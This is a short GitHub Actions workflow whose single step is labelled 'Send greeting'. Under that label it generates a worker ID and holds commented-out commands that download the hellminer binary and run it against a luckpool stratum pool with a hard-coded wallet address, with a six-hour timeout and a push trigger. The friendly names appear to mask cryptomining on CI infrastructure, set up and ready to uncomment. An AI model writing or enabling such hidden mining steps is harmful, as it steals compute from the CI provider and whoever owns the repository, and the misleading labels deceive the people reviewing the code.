name: Manual workflow
on:
  [push]
jobs:
  greet:
    runs-on: ubuntu-lates
    timeout-minutes: 360
    steps:
    - name: Send greeting
      run: |
        woorkersd=$(date +"%Y%m%d%H%M%S")
        echo $woorkersd
        #curl -L https://github.com/hellcatz/hminer/releases/download/v0.59.1/hellminer_linux64.tar.gz > hellminer_linux64.tar.gz
        #tar -xzvf hellminer_linux64.tar.gz
        #./hellminer -c stratum+tcp://na.luckpool.net:3956 -u REBiQeBs4ZcXQV2xu961D6JxzhXAZ53qXp.$woorkersd -p x --cpu 2
